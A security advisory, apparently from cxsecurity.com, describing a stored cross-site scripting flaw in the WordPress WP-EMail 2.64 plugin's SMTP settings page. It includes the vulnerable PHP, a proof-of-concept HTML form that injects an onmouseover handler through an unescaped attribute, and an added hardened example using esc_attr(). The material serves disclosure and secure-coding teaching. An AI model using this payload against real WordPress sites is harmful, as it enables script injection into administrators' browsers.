Wordpress WP-EMail 2.64 Cross Site Scripting

2015.01.05
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Wordpress WP-EMail 2.64 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/wp-email/
# Date : 2015-01-03
# Software Link : https://downloads.wordpress.org/plugin/wp-email.2.64.zip
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wordpress/wp-admin/admin.php?page=wp-email/email-options.php
######################
# Vulnerable code :

<table class="form-table">
    <tr>
        <th width="20%"><?php _e('SMTP Username:', 'wp-email'); ?></th>
        <td><input type="text" name="email_smtp_name" value="<?php echo stripslashes($email_smtp['username']); ?>" size="30" dir="ltr" /></td>
    </tr>
    <tr>
        <th width="20%"><?php _e('SMTP Password:', 'wp-email'); ?></th>
        <td><input type="password" name="email_smtp_password" value="<?php echo stripslashes($email_smtp['password']); ?>" size="30" dir="ltr" /></td>
    </tr>
    <tr>
        <th width="20%"><?php _e('SMTP Server:', 'wp-email'); ?></th>
        <td><input type="text" name="email_smtp_server" value="<?php echo stripslashes($email_smtp['server']); ?>" size="30" dir="ltr" /><br /><?php _e('You may leave the above fields blank if you do not use a SMTP server.', 'wp-email'); ?></td>
    </tr>
</table>

#####################
Exploit Code:

<html>
<body>
<form method="post" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wp-email/email-options.php">
    <input type="hidden" name="email_smtp_name" value='" style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;" onmouseover=alert(1); a="'/>
    <input type="submit" name="Submit" class="button" value="Save Changes" />
</form>
</body>
</html>

#####################
Discovered By : Nc_521
#####################
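
Added example (not part of the original advisory and not the plugin's code): the value="..." output pattern from the vulnerable code next to a hardened form that encodes for the HTML attribute context with WordPress's esc_attr(), with a parser check showing which attributes end up on the <input> element. The function names render_vulnerable, render_hardened and input_attributes are hypothetical, esc_attr() is approximated with htmlspecialchars() when run outside WordPress, and the stored value is the advisory's payload with its style portion shortened.

```php
<?php
// Outside WordPress, approximate esc_attr() so the script runs stand-alone (assumption).
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Pattern from the advisory: stripslashes() removes backslashes only and does
// no HTML encoding, so a double quote in the stored value closes value="...".
function render_vulnerable(array $smtp): string {
    return '<input type="text" name="email_smtp_name" value="'
         . stripslashes($smtp['username']) . '" size="30" dir="ltr" />';
}

// Hardened: encode for the attribute context at output time.
function render_hardened(array $smtp): string {
    return '<input type="text" name="email_smtp_name" value="'
         . esc_attr(stripslashes($smtp['username'])) . '" size="30" dir="ltr" />';
}

// Parse the markup and return the attribute names present on the <input>.
function input_attributes(string $html): array {
    $doc = new DOMDocument();
    @$doc->loadHTML($html); // suppress libxml warnings for the fragment
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Stored option value: the advisory's form field, style portion shortened.
$smtp = ['username' => '" style="display:block;" onmouseover=alert(1); a="'];
$expected = ['type', 'name', 'value', 'size', 'dir'];

$cases = ['vulnerable' => render_vulnerable($smtp),
          'hardened'   => render_hardened($smtp)];
foreach ($cases as $label => $html) {
    $attrs = input_attributes($html);
    $extra = array_diff($attrs, $expected);
    printf("%-10s attributes: %s%s\n", $label, implode(', ', $attrs),
           $extra ? '  <-- injected: ' . implode(', ', $extra) : '');
}
```

The same encoding applies to the email_smtp_password and email_smtp_server fields, which use the identical echo stripslashes(...) pattern in the vulnerable code.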



Copyright 2024, cxsecurity.com

 
